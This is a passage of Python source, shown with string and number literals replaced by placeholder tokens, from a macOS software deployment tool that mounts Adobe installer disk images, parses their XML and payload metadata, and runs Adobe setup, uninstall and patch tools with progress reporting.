'<STR_LIT>' % ( err , dmgname ) ) <EOL> if pliststr : <EOL> plist = FoundationPlist . readPlistFromString ( pliststr ) <EOL> for entity in plist [ '<STR_LIT>' ] : <EOL> if '<STR_LIT>' in entity : <EOL> mountpoints . append ( entity [ '<STR_LIT>' ] ) <EOL> return mountpoints <EOL> def getCS5uninstallXML ( optionXMLfile ) : <EOL> '''<STR_LIT>''' <EOL> xml = '<STR_LIT>' <EOL> dom = minidom . parse ( optionXMLfile ) <EOL> DeploymentInfo = dom . getElementsByTagName ( '<STR_LIT>' ) <EOL> if DeploymentInfo : <EOL> for info_item in DeploymentInfo : <EOL> DeploymentUninstall = info_item . getElementsByTagName ( <EOL> '<STR_LIT>' ) <EOL> if DeploymentUninstall : <EOL> deploymentData = DeploymentUninstall [ <NUM_LIT:0> ] . getElementsByTagName ( <EOL> '<STR_LIT>' ) <EOL> if deploymentData : <EOL> Deployment = deploymentData [ <NUM_LIT:0> ] <EOL> xml += Deployment . toxml ( '<STR_LIT>' ) <EOL> return xml <EOL> def getCS5mediaSignature ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> payloads_dir = "<STR_LIT>" <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( '<STR_LIT>' ) : <EOL> payloads_dir = path <EOL> if not payloads_dir : <EOL> return '<STR_LIT>' <EOL> setupxml = os . path . join ( payloads_dir , '<STR_LIT>' ) <EOL> if os . path . exists ( setupxml ) and os . path . isfile ( setupxml ) : <EOL> dom = minidom . parse ( setupxml ) <EOL> setupElements = dom . getElementsByTagName ( '<STR_LIT>' ) <EOL> if setupElements : <EOL> mediaSignatureElements = setupElements [ <NUM_LIT:0> ] . getElementsByTagName ( '<STR_LIT>' ) <EOL> if mediaSignatureElements : <EOL> element = mediaSignatureElements [ <NUM_LIT:0> ] <EOL> elementvalue = '<STR_LIT>' <EOL> for node in element . childNodes : <EOL> elementvalue += node . nodeValue <EOL> return elementvalue <EOL> return "<STR_LIT>" <EOL> def getPayloadInfo ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> payloadinfo = { } <EOL> if os . path . isdir ( dirpath ) : <EOL> proxy_paths = glob ( os . path . join ( dirpath , '<STR_LIT>' ) ) <EOL> if proxy_paths : <EOL> xmlpath = proxy_paths [ <NUM_LIT:0> ] <EOL> dom = minidom . parse ( xmlpath ) <EOL> else : <EOL> db_path = os . path . join ( dirpath , '<STR_LIT>' ) <EOL> if os . path . exists ( db_path ) : <EOL> conn = sqlite3 . connect ( db_path ) <EOL> cur = conn . cursor ( ) <EOL> cur . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> result = cur . fetchone ( ) <EOL> cur . close ( ) <EOL> if result : <EOL> info_xml = result [ <NUM_LIT:0> ] . encode ( '<STR_LIT>' ) <EOL> dom = minidom . parseString ( info_xml ) <EOL> else : <EOL> return payloadinfo <EOL> payload_info = dom . getElementsByTagName ( '<STR_LIT>' ) <EOL> if payload_info : <EOL> installer_properties = payload_info [ <NUM_LIT:0> ] . getElementsByTagName ( <EOL> '<STR_LIT>' ) <EOL> if installer_properties : <EOL> properties = installer_properties [ <NUM_LIT:0> ] . getElementsByTagName ( <EOL> '<STR_LIT>' ) <EOL> for prop in properties : <EOL> if '<STR_LIT:name>' in prop . attributes . keys ( ) : <EOL> propname = prop . attributes [ '<STR_LIT:name>' ] . value . encode ( '<STR_LIT>' ) <EOL> propvalue = '<STR_LIT>' <EOL> for node in prop . childNodes : <EOL> propvalue += node . nodeValue <EOL> if propname == '<STR_LIT>' : <EOL> payloadinfo [ '<STR_LIT>' ] = propvalue <EOL> if propname == '<STR_LIT>' : <EOL> payloadinfo [ '<STR_LIT>' ] = propvalue <EOL> if propname == '<STR_LIT>' : <EOL> payloadinfo [ '<STR_LIT:version>' ] = propvalue <EOL> installmetadata = payload_info [ <NUM_LIT:0> ] . getElementsByTagName ( <EOL> '<STR_LIT>' ) <EOL> if installmetadata : <EOL> totalsizes = installmetadata [ <NUM_LIT:0> ] . getElementsByTagName ( <EOL> '<STR_LIT>' ) <EOL> if totalsizes : <EOL> installsize = '<STR_LIT>' <EOL> for node in totalsizes [ <NUM_LIT:0> ] . childNodes : <EOL> installsize += node . nodeValue <EOL> payloadinfo [ '<STR_LIT>' ] = int ( installsize ) / <NUM_LIT> <EOL> return payloadinfo <EOL> def getAdobeSetupInfo ( installroot ) : <EOL> '''<STR_LIT>''' <EOL> info = { } <EOL> payloads = [ ] <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( installroot ) : <EOL> if path . endswith ( '<STR_LIT>' ) : <EOL> driverfolder = '<STR_LIT>' <EOL> mediaSignature = '<STR_LIT>' <EOL> setupxml = os . path . join ( path , '<STR_LIT>' ) <EOL> if os . path . exists ( setupxml ) : <EOL> dom = minidom . parse ( setupxml ) <EOL> drivers = dom . getElementsByTagName ( '<STR_LIT>' ) <EOL> if drivers : <EOL> driver = drivers [ <NUM_LIT:0> ] <EOL> if '<STR_LIT>' in driver . attributes . keys ( ) : <EOL> driverfolder = driver . attributes [ <EOL> '<STR_LIT>' ] . value . encode ( '<STR_LIT>' ) <EOL> if driverfolder == '<STR_LIT>' : <EOL> setupElements = dom . getElementsByTagName ( '<STR_LIT>' ) <EOL> if setupElements : <EOL> mediaSignatureElements = setupElements [ <EOL> <NUM_LIT:0> ] . getElementsByTagName ( '<STR_LIT>' ) <EOL> if mediaSignatureElements : <EOL> element = mediaSignatureElements [ <NUM_LIT:0> ] <EOL> for node in element . childNodes : <EOL> mediaSignature += node . nodeValue <EOL> for item in munkicommon . listdir ( path ) : <EOL> payloadpath = os . path . join ( path , item ) <EOL> payloadinfo = getPayloadInfo ( payloadpath ) <EOL> if payloadinfo : <EOL> payloads . append ( payloadinfo ) <EOL> if ( ( driverfolder and item == driverfolder ) or <EOL> ( mediaSignature and <EOL> payloadinfo [ '<STR_LIT>' ] == mediaSignature ) ) : <EOL> info [ '<STR_LIT>' ] = payloadinfo [ '<STR_LIT>' ] <EOL> info [ '<STR_LIT:version>' ] = payloadinfo [ '<STR_LIT:version>' ] <EOL> info [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if not payloads : <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( installroot ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> for item in munkicommon . listdir ( path ) : <EOL> if item . find ( "<STR_LIT>" ) == - <NUM_LIT:1> : <EOL> itempath = os . path . join ( path , item ) <EOL> payloadinfo = getPayloadInfo ( itempath ) <EOL> if payloadinfo : <EOL> payloads . append ( payloadinfo ) <EOL> break <EOL> if payloads : <EOL> if len ( payloads ) == <NUM_LIT:1> : <EOL> info [ '<STR_LIT>' ] = payloads [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> info [ '<STR_LIT:version>' ] = payloads [ <NUM_LIT:0> ] [ '<STR_LIT:version>' ] <EOL> else : <EOL> if not '<STR_LIT>' in info : <EOL> info [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> if not '<STR_LIT:version>' in info : <EOL> info [ '<STR_LIT:version>' ] = "<STR_LIT>" <EOL> info [ '<STR_LIT>' ] = payloads <EOL> installed_size = <NUM_LIT:0> <EOL> for payload in payloads : <EOL> installed_size = installed_size + payload . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> info [ '<STR_LIT>' ] = installed_size <EOL> return info <EOL> def getAdobePackageInfo ( installroot ) : <EOL> '''<STR_LIT>''' <EOL> info = getAdobeSetupInfo ( installroot ) <EOL> info [ '<STR_LIT:description>' ] = "<STR_LIT>" <EOL> installerxml = os . path . join ( installroot , "<STR_LIT>" ) <EOL> if os . path . exists ( installerxml ) : <EOL> description = '<STR_LIT>' <EOL> dom = minidom . parse ( installerxml ) <EOL> installinfo = dom . getElementsByTagName ( "<STR_LIT>" ) <EOL> if installinfo : <EOL> packagedescriptions = installinfo [ <NUM_LIT:0> ] . getElementsByTagName ( "<STR_LIT>" ) <EOL> if packagedescriptions : <EOL> prop = packagedescriptions [ <NUM_LIT:0> ] <EOL> for node in prop . childNodes : <EOL> description += node . nodeValue <EOL> if description : <EOL> description_parts = description . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> info [ '<STR_LIT>' ] = description_parts [ <NUM_LIT:0> ] <EOL> if len ( description_parts ) > <NUM_LIT:1> : <EOL> info [ '<STR_LIT:description>' ] = description_parts [ <NUM_LIT:1> ] <EOL> else : <EOL> info [ '<STR_LIT:description>' ] = "<STR_LIT>" <EOL> return info <EOL> else : <EOL> installerxml = os . path . join ( installroot , "<STR_LIT>" ) <EOL> if os . path . exists ( installerxml ) : <EOL> dom = minidom . parse ( installerxml ) <EOL> installinfo = dom . getElementsByTagName ( "<STR_LIT>" ) <EOL> if installinfo : <EOL> pkgname_elems = installinfo [ <NUM_LIT:0> ] . getElementsByTagName ( <EOL> "<STR_LIT>" ) <EOL> if pkgname_elems : <EOL> prop = pkgname_elems [ <NUM_LIT:0> ] <EOL> pkgname = "<STR_LIT>" <EOL> for node in prop . childNodes : <EOL> pkgname += node . nodeValue <EOL> info [ '<STR_LIT>' ] = pkgname <EOL> if not info . get ( '<STR_LIT>' ) : <EOL> info [ '<STR_LIT>' ] = os . path . basename ( installroot ) <EOL> return info <EOL> def getXMLtextElement ( dom_node , name ) : <EOL> '''<STR_LIT>''' <EOL> value = None <EOL> subelements = dom_node . getElementsByTagName ( name ) <EOL> if subelements : <EOL> value = '<STR_LIT>' <EOL> for node in subelements [ <NUM_LIT:0> ] . childNodes : <EOL> value += node . nodeValue <EOL> return value <EOL> def parseOptionXML ( option_xml_file ) : <EOL> '''<STR_LIT>''' <EOL> info = { } <EOL> dom = minidom . parse ( option_xml_file ) <EOL> installinfo = dom . getElementsByTagName ( '<STR_LIT>' ) <EOL> if installinfo : <EOL> if '<STR_LIT:id>' in installinfo [ <NUM_LIT:0> ] . attributes . keys ( ) : <EOL> info [ '<STR_LIT>' ] = installinfo [ <NUM_LIT:0> ] . attributes [ '<STR_LIT:id>' ] . value <EOL> if '<STR_LIT:version>' in installinfo [ <NUM_LIT:0> ] . attributes . keys ( ) : <EOL> info [ '<STR_LIT>' ] = installinfo [ <EOL> <NUM_LIT:0> ] . attributes [ '<STR_LIT:version>' ] . value <EOL> info [ '<STR_LIT>' ] = getXMLtextElement ( installinfo [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> info [ '<STR_LIT>' ] = getXMLtextElement ( installinfo [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> info [ '<STR_LIT>' ] = [ ] <EOL> medias_elements = installinfo [ <NUM_LIT:0> ] . getElementsByTagName ( '<STR_LIT>' ) <EOL> if medias_elements : <EOL> media_elements = medias_elements [ <NUM_LIT:0> ] . getElementsByTagName ( '<STR_LIT>' ) <EOL> if media_elements : <EOL> for media in media_elements : <EOL> product = { } <EOL> product [ '<STR_LIT>' ] = getXMLtextElement ( media , '<STR_LIT>' ) <EOL> product [ '<STR_LIT>' ] = getXMLtextElement ( <EOL> media , '<STR_LIT>' ) <EOL> setup_elements = media . getElementsByTagName ( '<STR_LIT>' ) <EOL> if setup_elements : <EOL> mediaSignatureElements = setup_elements [ <EOL> <NUM_LIT:0> ] . getElementsByTagName ( '<STR_LIT>' ) <EOL> if mediaSignatureElements : <EOL> product [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> element = mediaSignatureElements [ <NUM_LIT:0> ] <EOL> for node in element . childNodes : <EOL> product [ '<STR_LIT>' ] += node . nodeValue <EOL> info [ '<STR_LIT>' ] . append ( product ) <EOL> return info <EOL> def countPayloads ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> count = <NUM_LIT:0> <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> for subitem in munkicommon . listdir ( path ) : <EOL> subitempath = os . path . join ( path , subitem ) <EOL> if os . path . isdir ( subitempath ) : <EOL> count = count + <NUM_LIT:1> <EOL> return count <EOL> def getPercent ( current , maximum ) : <EOL> '''<STR_LIT>''' <EOL> if maximum == <NUM_LIT:0> : <EOL> percentdone = - <NUM_LIT:1> <EOL> elif current < <NUM_LIT:0> : <EOL> percentdone = - <NUM_LIT:1> <EOL> elif current > maximum : <EOL> percentdone = - <NUM_LIT:1> <EOL> elif current == maximum : <EOL> percentdone = <NUM_LIT:100> <EOL> else : <EOL> percentdone = int ( float ( current ) / float ( maximum ) * <NUM_LIT:100> ) <EOL> return percentdone <EOL> def findSetupApp ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> setup_path = os . path . join ( path , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if os . path . exists ( setup_path ) : <EOL> return setup_path <EOL> return '<STR_LIT>' <EOL> def findInstallApp ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> setup_path = os . path . join ( path , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if os . path . exists ( setup_path ) : <EOL> return setup_path <EOL> return '<STR_LIT>' <EOL> def findAdobePatchInstallerApp ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> setup_path = os . path . join ( <EOL> path , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if os . path . exists ( setup_path ) : <EOL> return setup_path <EOL> return '<STR_LIT>' <EOL> def findAdobeDeploymentManager ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> dm_path = os . path . join ( path , "<STR_LIT>" ) <EOL> if os . path . exists ( dm_path ) : <EOL> return dm_path <EOL> return '<STR_LIT>' <EOL> secondsToLive = { } <EOL> def killStupidProcesses ( ) : <EOL> '''<STR_LIT>''' <EOL> stupid_processes = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] <EOL> for procname in stupid_processes : <EOL> pid = utils . getPIDforProcessName ( procname ) <EOL> if pid : <EOL> if not pid in secondsToLive : <EOL> secondsToLive [ pid ] = <NUM_LIT:30> <EOL> else : <EOL> secondsToLive [ pid ] = secondsToLive [ pid ] - <NUM_LIT:1> <EOL> if secondsToLive [ pid ] == <NUM_LIT:0> : <EOL> munkicommon . log ( "<STR_LIT>" % ( pid , procname ) ) <EOL> try : <EOL> os . kill ( int ( pid ) , <NUM_LIT:9> ) <EOL> except OSError : <EOL> pass <EOL> del secondsToLive [ pid ] <EOL> return <EOL> def runAdobeInstallTool ( <EOL> cmd , number_of_payloads = <NUM_LIT:0> , killAdobeAIR = False , payloads = None , <EOL> kind = "<STR_LIT>" , operation = "<STR_LIT>" ) : <EOL> '''<STR_LIT>''' <EOL> progress_monitor = AdobeInstallProgressMonitor ( <EOL> kind = kind , operation = operation ) <EOL> if munkicommon . munkistatusoutput and not number_of_payloads : <EOL> munkistatus . percent ( - <NUM_LIT:1> ) <EOL> proc = subprocess . Popen ( cmd , shell = False , bufsize = <NUM_LIT:1> , <EOL> stdin = subprocess . PIPE , <EOL> stdout = subprocess . PIPE , stderr = subprocess . STDOUT ) <EOL> old_payload_completed_count = <NUM_LIT:0> <EOL> payloadname = "<STR_LIT>" <EOL> while proc . poll ( ) == None : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> ( payload_completed_count , adobe_code ) = progress_monitor . info ( ) <EOL> if payload_completed_count > old_payload_completed_count : <EOL> old_payload_completed_count = payload_completed_count <EOL> if adobe_code and payloads : <EOL> matched_payloads = [ payload for payload in payloads <EOL> if payload . get ( '<STR_LIT>' ) == adobe_code ] <EOL> if matched_payloads : <EOL> payloadname = matched_payloads [ <NUM_LIT:0> ] . get ( '<STR_LIT>' ) <EOL> else : <EOL> payloadname = adobe_code <EOL> payloadinfo = "<STR_LIT>" + payloadname <EOL> else : <EOL> payloadinfo = "<STR_LIT>" <EOL> if number_of_payloads : <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % <EOL> ( payload_completed_count , number_of_payloads , <EOL> payloadinfo ) ) <EOL> else : <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' , <EOL> payload_completed_count , payloadinfo ) <EOL> if munkicommon . munkistatusoutput : <EOL> munkistatus . percent ( <EOL> getPercent ( payload_completed_count , number_of_payloads ) ) <EOL> if killAdobeAIR : <EOL> if ( not munkicommon . getconsoleuser ( ) or <EOL> munkicommon . getconsoleuser ( ) == u"<STR_LIT>" ) : <EOL> killStupidProcesses ( ) <EOL> retcode = proc . poll ( ) <EOL> output = proc . stdout . readlines ( ) <EOL> for line in output : <EOL> line = line . rstrip ( "<STR_LIT:\n>" ) <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> munkicommon . display_error ( line ) <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> if retcode == <NUM_LIT:0> : <EOL> try : <EOL> retcode = int ( line [ <NUM_LIT:11> : ] ) <EOL> except ( ValueError , TypeError ) : <EOL> retcode = - <NUM_LIT:1> <EOL> if retcode != <NUM_LIT:0> and retcode != <NUM_LIT:8> : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' , retcode , adobeSetupError ( retcode ) ) <EOL> else : <EOL> if munkicommon . munkistatusoutput : <EOL> munkistatus . percent ( <NUM_LIT:100> ) <EOL> munkicommon . display_status_minor ( '<STR_LIT>' ) <EOL> return retcode <EOL> def runAdobeSetup ( dmgpath , uninstalling = False , payloads = None ) : <EOL> '''<STR_LIT>''' <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % os . path . basename ( dmgpath ) ) <EOL> mountpoints = mountAdobeDmg ( dmgpath ) <EOL> if mountpoints : <EOL> setup_path = findSetupApp ( mountpoints [ <NUM_LIT:0> ] ) <EOL> if setup_path : <EOL> deploymentfile = None <EOL> installxml = os . path . join ( mountpoints [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> uninstallxml = os . path . join ( mountpoints [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> if uninstalling : <EOL> operation = '<STR_LIT>' <EOL> if os . path . exists ( uninstallxml ) : <EOL> deploymentfile = uninstallxml <EOL> else : <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' , <EOL> os . path . basename ( dmgpath ) ) <EOL> return - <NUM_LIT:1> <EOL> else : <EOL> operation = '<STR_LIT>' <EOL> if os . path . exists ( installxml ) : <EOL> deploymentfile = installxml <EOL> number_of_payloads = countPayloads ( mountpoints [ <NUM_LIT:0> ] ) <EOL> munkicommon . display_status_minor ( '<STR_LIT>' ) <EOL> adobe_setup = [ setup_path , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if deploymentfile : <EOL> adobe_setup . append ( '<STR_LIT>' % deploymentfile ) <EOL> retcode = runAdobeInstallTool ( <EOL> adobe_setup , number_of_payloads , payloads = payloads , <EOL> kind = '<STR_LIT>' , operation = operation ) <EOL> else : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' % <EOL> os . path . basename ( dmgpath ) ) <EOL> retcode = - <NUM_LIT:1> <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> return retcode <EOL> else : <EOL> munkicommon . display_error ( '<STR_LIT>' % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> def writefile ( stringdata , path ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> fileobject = open ( path , mode = '<STR_LIT:w>' , buffering = <NUM_LIT:1> ) <EOL> print >> fileobject , stringdata . encode ( '<STR_LIT>' ) <EOL> fileobject . close ( ) <EOL> return path <EOL> except ( OSError , IOError ) : <EOL> munkicommon . display_error ( "<STR_LIT>" % stringdata ) <EOL> return "<STR_LIT>" <EOL> def doAdobeCS5Uninstall ( adobeInstallInfo , payloads = None ) : <EOL> '''<STR_LIT>''' <EOL> uninstallxml = adobeInstallInfo . get ( '<STR_LIT>' ) <EOL> if not uninstallxml : <EOL> munkicommon . display_error ( "<STR_LIT>" ) <EOL> return - <NUM_LIT:1> <EOL> payloadcount = adobeInstallInfo . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> path = os . path . join ( munkicommon . tmpdir ( ) , "<STR_LIT>" ) <EOL> deploymentFile = writefile ( uninstallxml , path ) <EOL> if not deploymentFile : <EOL> return - <NUM_LIT:1> <EOL> setupapp = "<STR_LIT>" <EOL> setup = os . path . join ( setupapp , "<STR_LIT>" ) <EOL> if not os . path . exists ( setup ) : <EOL> munkicommon . display_error ( "<STR_LIT>" % setupapp ) <EOL> return - <NUM_LIT:1> <EOL> uninstall_cmd = [ setup , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % deploymentFile ] <EOL> munkicommon . display_status_minor ( '<STR_LIT>' ) <EOL> return runAdobeInstallTool ( uninstall_cmd , payloadcount , payloads = payloads , <EOL> kind = '<STR_LIT>' , operation = '<STR_LIT>' ) <EOL> def runAdobeCCPpkgScript ( dmgpath , payloads = None , operation = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % os . path . basename ( dmgpath ) ) <EOL> mountpoints = mountAdobeDmg ( dmgpath ) <EOL> if not mountpoints : <EOL> munkicommon . display_error ( "<STR_LIT>" % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> deploymentmanager = findAdobeDeploymentManager ( mountpoints [ <NUM_LIT:0> ] ) <EOL> if not deploymentmanager : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' , <EOL> os . path . basename ( dmgpath ) ) <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> return - <NUM_LIT:1> <EOL> basepath = os . path . dirname ( deploymentmanager ) <EOL> preinstall_script = os . path . join ( basepath , "<STR_LIT>" ) <EOL> if not os . path . exists ( preinstall_script ) : <EOL> if operation == '<STR_LIT>' : <EOL> munkicommon . display_error ( <EOL> "<STR_LIT>" % dmgpath ) <EOL> else : <EOL> munkicommon . display_error ( <EOL> "<STR_LIT>" % dmgpath ) <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> return - <NUM_LIT:1> <EOL> number_of_payloads = countPayloads ( basepath ) <EOL> tmpdir = tempfile . mkdtemp ( prefix = '<STR_LIT>' , dir = '<STR_LIT>' ) <EOL> for dir_name in [ '<STR_LIT>' '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if os . path . isdir ( os . path . join ( basepath , dir_name ) ) : <EOL> os . symlink ( os . path . join ( basepath , dir_name ) , <EOL> os . path . join ( tmpdir , dir_name ) ) <EOL> for dir_name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> realdir = os . path . join ( basepath , dir_name ) <EOL> if os . path . isdir ( realdir ) : <EOL> tmpsubdir = os . path . join ( tmpdir , dir_name ) <EOL> os . mkdir ( tmpsubdir ) <EOL> for item in munkicommon . listdir ( realdir ) : <EOL> os . symlink ( os . path . join ( realdir , item ) , <EOL> os . path . join ( tmpsubdir , item ) ) <EOL> os_version_tuple = munkicommon . getOsVersion ( as_tuple = True ) <EOL> if ( os_version_tuple < ( <NUM_LIT:10> , <NUM_LIT:11> ) and <EOL> ( not munkicommon . getconsoleuser ( ) or <EOL> munkicommon . getconsoleuser ( ) == u"<STR_LIT>" ) ) : <EOL> loginwindowPID = utils . getPIDforProcessName ( "<STR_LIT>" ) <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , loginwindowPID ] <EOL> else : <EOL> cmd = [ ] <EOL> pkg_dir = os . path . dirname ( os . path . dirname ( basepath ) ) <EOL> cmd . extend ( [ preinstall_script , pkg_dir , '<STR_LIT:/>' , '<STR_LIT:/>' ] ) <EOL> if operation == '<STR_LIT>' : <EOL> munkicommon . display_status_minor ( '<STR_LIT>' ) <EOL> retcode = runAdobeInstallTool ( <EOL> cmd , number_of_payloads , killAdobeAIR = True , payloads = payloads , <EOL> kind = '<STR_LIT>' , operation = operation ) <EOL> dummy_result = subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , tmpdir ] ) <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> return retcode <EOL> def runAdobeCS5AAMEEInstall ( dmgpath , payloads = None ) : <EOL> '''<STR_LIT>''' <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % os . path . basename ( dmgpath ) ) <EOL> mountpoints = mountAdobeDmg ( dmgpath ) <EOL> if not mountpoints : <EOL> munkicommon . display_error ( "<STR_LIT>" % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> deploymentmanager = findAdobeDeploymentManager ( mountpoints [ <NUM_LIT:0> ] ) <EOL> if deploymentmanager : <EOL> basepath = os . path . dirname ( deploymentmanager ) <EOL> number_of_payloads = countPayloads ( basepath ) <EOL> tmpdir = tempfile . mkdtemp ( prefix = '<STR_LIT>' , dir = '<STR_LIT>' ) <EOL> os . symlink ( os . path . join ( basepath , "<STR_LIT>" ) , os . path . join ( tmpdir , "<STR_LIT>" ) ) <EOL> os . symlink ( os . path . join ( basepath , "<STR_LIT>" ) , <EOL> os . path . join ( tmpdir , "<STR_LIT>" ) ) <EOL> for dir_name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> realdir = os . path . join ( basepath , dir_name ) <EOL> if os . path . isdir ( realdir ) : <EOL> tmpsubdir = os . path . join ( tmpdir , dir_name ) <EOL> os . mkdir ( tmpsubdir ) <EOL> for item in munkicommon . listdir ( realdir ) : <EOL> os . symlink ( <EOL> os . path . join ( realdir , item ) , <EOL> os . path . join ( tmpsubdir , item ) ) <EOL> optionXMLfile = os . path . join ( basepath , "<STR_LIT>" ) <EOL> os_version_tuple = munkicommon . getOsVersion ( as_tuple = True ) <EOL> if ( os_version_tuple < ( <NUM_LIT:10> , <NUM_LIT:11> ) and <EOL> ( not munkicommon . getconsoleuser ( ) or <EOL> munkicommon . getconsoleuser ( ) == u"<STR_LIT>" ) ) : <EOL> loginwindowPID = utils . getPIDforProcessName ( "<STR_LIT>" ) <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , loginwindowPID ] <EOL> else : <EOL> cmd = [ ] <EOL> cmd . extend ( [ deploymentmanager , '<STR_LIT>' % optionXMLfile , <EOL> '<STR_LIT>' % basepath , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> munkicommon . display_status_minor ( '<STR_LIT>' ) <EOL> retcode = runAdobeInstallTool ( <EOL> cmd , number_of_payloads , killAdobeAIR = True , payloads = payloads , <EOL> kind = '<STR_LIT>' , operation = '<STR_LIT>' ) <EOL> dummy_result = subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , tmpdir ] ) <EOL> else : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' , <EOL> os . path . basename ( dmgpath ) ) <EOL> retcode = - <NUM_LIT:1> <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> return retcode <EOL> def runAdobeCS5PatchInstaller ( dmgpath , copylocal = False , payloads = None ) : <EOL> '''<STR_LIT>''' <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % os . path . basename ( dmgpath ) ) <EOL> mountpoints = mountAdobeDmg ( dmgpath ) <EOL> if mountpoints : <EOL> if copylocal : <EOL> updatedir = tempfile . mkdtemp ( prefix = '<STR_LIT>' , dir = '<STR_LIT>' ) <EOL> retcode = subprocess . call ( <EOL> [ "<STR_LIT>" , "<STR_LIT>" , mountpoints [ <NUM_LIT:0> ] , updatedir ] ) <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> if retcode : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> dummy_result = subprocess . call ( [ "<STR_LIT>" , dmgpath ] ) <EOL> else : <EOL> updatedir = mountpoints [ <NUM_LIT:0> ] <EOL> patchinstaller = findAdobePatchInstallerApp ( updatedir ) <EOL> if patchinstaller : <EOL> number_of_payloads = countPayloads ( updatedir ) <EOL> munkicommon . display_status_minor ( '<STR_LIT>' ) <EOL> install_cmd = [ patchinstaller , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> retcode = runAdobeInstallTool ( install_cmd , <EOL> number_of_payloads , payloads = payloads , <EOL> kind = '<STR_LIT>' , operation = '<STR_LIT>' ) <EOL> else : <EOL> munkicommon . display_error ( <EOL> "<STR_LIT>" , <EOL> os . path . basename ( dmgpath ) ) <EOL> retcode = - <NUM_LIT:1> <EOL> if copylocal : <EOL> dummy_result = subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , updatedir ] ) <EOL> else : <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> return retcode <EOL> else : <EOL> munkicommon . display_error ( '<STR_LIT>' % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> def runAdobeUberTool ( dmgpath , pkgname = '<STR_LIT>' , uninstalling = False , payloads = None ) : <EOL> '''<STR_LIT>''' 